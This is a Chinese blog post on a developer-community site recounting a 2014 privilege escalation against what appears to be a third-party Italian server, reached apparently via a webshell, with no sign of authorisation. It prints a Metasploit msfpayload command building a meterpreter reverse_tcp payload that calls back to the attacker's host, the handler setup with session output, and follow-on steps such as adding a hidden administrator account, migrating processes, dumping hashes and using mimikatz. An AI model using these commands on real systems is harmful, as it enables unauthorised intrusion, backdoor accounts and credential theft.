AI 助理
备案控制台登录注册
开发者社区 安全 文章 正文

记一次提权添加管理员实战案例

2023-09-29 85 发布于吉林
版权
举报
版权声明:
本文内容由阿里云实名注册用户自发贡献,版权归原作者所有,阿里云开发者社区不拥有其著作权,亦不承担相应法律责任。具体规则请查看《 阿里云开发者社区用户服务协议》和 《阿里云开发者社区知识产权保护指引》。如果您发现本社区中有涉嫌抄袭的内容,填写 侵权投诉表单进行举报,一经查实,本社区将立刻删除涉嫌侵权内容。
简介: 记一次提权添加管理员实战案例

0x01 前言

这个案例记录的是笔者2014年测试的一台服务器,闲着无聊之时在“中国菜刀”上找了一个以前的意大利站点做测试,这是很久以前的站了,都忘了有没有提权过了,试了下刚放出来的CVE-2014-4113都失败了,执行后无回显。


0x02 实战提权过程

首先我们先利用Metasploit的msfpayload命令生成一个普通的exe载荷上传至目标可读写目录中,配置好监听模块的相关参数,然后执行即可得到一个普通权限的会话。

    msfpayload windows/meterpreter/reverse_tcp lhost=1*3.2*1.*7.*7 lport=7777 X > /media/sf_系统学习/test.exe


    注:这里提一下为什么我们生成载荷时填的公网IP,而在配置监听模块时填的内网IP?那是因为当时是用本地局域网的kali进行测试的,最后是用路由器的端口映射功能将Kali的7777端口映射出来的。

      msf > use exploit/multi/handler 
msf exploit(handler) > set PAYLOAD windows/meterpreter/reverse_tcp
msf exploit(handler) > set LHOST 192.168.1.4
msf exploit(handler) > set LPORT 7777
msf exploit(handler) > exploit 
[*] Started reverse handler on 192.168.1.4:7777 
[*] Starting the payload handler...
[*] Sending stage (770048 bytes) to 6*.7*.2*3.5*
[*] Meterpreter session 6 opened (192.168.1.4:7777 -> 6*.7*.2*3.5*:2446) at 2014-10-26


      习惯性的先执行了下getsystem命令居然成功将权限提升至SYSTEM,接着测试了下其它命令,当我们测试到shell命令时发现虽然已经进入到命令终端了,但是依旧为zorro\iwam_server普通权限。


      通过Google搜索看到Hak5安全社区中有人也提到过类似问题,解决办法大概意思就是说我们需要先将当前会话的进程迁移至Admin/System权限运行的进程上去,然后才能有权限添加管理员用户。

      Before meterpreter will drop into a shell with system privileges, it first has to migrate to a process with system privs. If you drop directly in like I was doing you'll have whatever privs the browser was running with. 
After the migration to a process with sys/admin privs, if you drop into a shell you'll have sys privs.


      目前因权限不够而暂时无法直接在命令终端添加管理员用户,那么还有什么方法可以添加管理员用户或者得到目标管理员的密码呢?这里笔者另外提供几种思路,仅供参考,1-2断开会话,3-5已成功!


      (1) run getgui -u test$ -p 123456(添加管理员)


      (2) migrate 3760(迁移到system运行的进程)


      (3) use incognito(加载incognito扩展)


      (4) hashdump(获取系统hash值并破解)


      (5) 其它方法,如:mimikatz扩展、smart_hashdump模块等方法


      文章标签:
      Shell
      数据安全/隐私保护
      网络架构
      安全
      潇湘信安
      +关注
      110文章
      目录
      打赏
      0
      0
      0
      0
      4
      分享
      相关文章
      猫头虎
      |
      Kubernetes Cloud Native Linux
      10个Linux命令,每个管理员都应该知道
      10个Linux命令,每个管理员都应该知道
      猫头虎
      86 1
      潇湘信安
      |
      安全 PHP Apache
      记一次匈牙利服务器提权案例
      记一次匈牙利服务器提权案例
      潇湘信安
      110 0
      土木林森
      |
      12月前
      |
      安全 Linux 数据安全/隐私保护
      【专栏】在 Linux 系统中,掌握查找文件所有者的方法对于系统管理和安全审计至关重要
      【4月更文挑战第28天】在 Linux 系统中,掌握查找文件所有者的方法对于系统管理和安全审计至关重要。本文介绍了基本和高级技巧:使用`ls -l`和`stat`命令查看文件详细信息,通过文件路径、通配符或结合`find`、`grep`命令进行查找。实际案例包括查找特定、多个及隐藏文件的所有者。注意权限、文件系统类型和系统环境可能影响查找。了解这些方法能提升 Linux 系统管理效率。
      土木林森
      165 0
      潇湘信安
      |
      安全 关系型数据库 MySQL
      黑吃黑Getshell到提权实战案例
      黑吃黑Getshell到提权实战案例
      潇湘信安
      384 0
      linuszhang
      |
      存储 人工智能 Shell
      第二章 常用命令及帐户管理
      第二章 常用命令及帐户管理浩 Zone | Magehao’Blog 原创  http://magehao.com  Linux学习笔记
      linuszhang
      78 0
      我是koten
      |
      运维 网络安全 数据库
      【运维知识进阶篇】一篇文章带你搞懂Jumperserver(保姆级教程:安装+用户与用户组+创建资产+授权资产+创建数据库+sudo提权+命令过滤+多因子认证+网域功能+审计台)(一)
      【运维知识进阶篇】一篇文章带你搞懂Jumperserver(保姆级教程:安装+用户与用户组+创建资产+授权资产+创建数据库+sudo提权+命令过滤+多因子认证+网域功能+审计台)
      我是koten
      1328 0
      我是koten
      |
      运维 数据库
      【运维知识进阶篇】一篇文章带你搞懂Jumperserver(保姆级教程:安装+用户与用户组+创建资产+授权资产+创建数据库+sudo提权+命令过滤+多因子认证+网域功能+审计台)(三)
      【运维知识进阶篇】一篇文章带你搞懂Jumperserver(保姆级教程:安装+用户与用户组+创建资产+授权资产+创建数据库+sudo提权+命令过滤+多因子认证+网域功能+审计台)(三)
      我是koten
      310 0
      我是koten
      |
      运维 监控 小程序
      【运维知识进阶篇】一篇文章带你搞懂Jumperserver(保姆级教程:安装+用户与用户组+创建资产+授权资产+创建数据库+sudo提权+命令过滤+多因子认证+网域功能+审计台)(四)
      【运维知识进阶篇】一篇文章带你搞懂Jumperserver(保姆级教程:安装+用户与用户组+创建资产+授权资产+创建数据库+sudo提权+命令过滤+多因子认证+网域功能+审计台)(四)
      我是koten
      790 0
      我是koten
      |
      运维 数据库 数据安全/隐私保护
      【运维知识进阶篇】一篇文章带你搞懂Jumperserver(保姆级教程:安装+用户与用户组+创建资产+授权资产+创建数据库+sudo提权+命令过滤+多因子认证+网域功能+审计台)(二)
      【运维知识进阶篇】一篇文章带你搞懂Jumperserver(保姆级教程:安装+用户与用户组+创建资产+授权资产+创建数据库+sudo提权+命令过滤+多因子认证+网域功能+审计台)(二)
      我是koten
      324 0
      漏刻有时
      |
      API 数据安全/隐私保护
      漏刻有时忘记超级管理员密码的解决方案:通过API接口设置超级管理员
      漏刻有时忘记超级管理员密码的解决方案:通过API接口设置超级管理员
      漏刻有时
      154 0

      热门文章

      最新文章

    • 1
      阿里云账户间域名转让流程(新手教程)
      16
    • 2
      解决删除文件时出现“该项目不在XX中,请确认该项目的位置然后重试”的提示
      23
    • 3
      Dubbo的Zookeeper单机配置和Zookeeper集群配置
      18
    • 4
      阿里配置中心Diamond探索
      39
    • 5
      业内首次融合数据仓库与数据湖 阿里云推出下一代大数据平台 “湖仓一体”
      14
    • 6
      阿里云大使推广及积分规则
      5
    • 7
      如何使用VNC远程Linux,这款开源神器你废吗?
      8
    • 8
      阿里云创峰会•遂昌专场圆满结束,阿里云携手遂昌共话“数字绿谷”发展未来
      4
    • 9
      《UML用户指南(第2版.修订版)》—第1章1.3节面向对象建模
      5
    • 10
      在ternimal中打开explore或者文件
      3
    • 1
      OpenResty深度解析:从卓伊凡的”隐形主流”论看其深度原理与应用生态-卓伊凡
      54
    • 2
      5G落地没那么简单!细扒部署挑战与硬核解决方案
      49
    • 3
      运维人别硬扛了!看AI怎么帮你流程标准化又快又稳
      55
    • 4
      别再野蛮操作了!用Python优雅地搞定数据清洗
      65
    • 5
      OpenResty技术深度解析:原理、应用与生态对比-优雅草卓伊凡
      43
    • 6
      【SQL周周练】一句 SQL 如何帮助 5 个人买到电影院最好的座位?
      49
    • 7
      《解锁Spline:低代码3D设计的前端开发秘籍》
      40
    • 8
      《别盲目做Web3D交互!Three.js和React Three Fiber难点大揭秘》
      36
    • 9
      《凭什么撼动Node.js?Bun和Zig性能优势深度揭秘》
      32
    • 10
      《Astro 3.0岛屿架构让内容网站“脱胎换骨”》
      31

      • 相关电子书

      更多
    • 低代码开发师(初级)实战教程
    • 冬季实战营第三期:MySQL数据库进阶实战
    • 阿里巴巴DevOps 最佳实践手册

      • 相关实验场景

      更多
    • Linux指令入门-系统管理
      • 下一篇
      oss创建bucket
      AI助理

      你好,我是AI助理

      可以解答问题、推荐解决方案等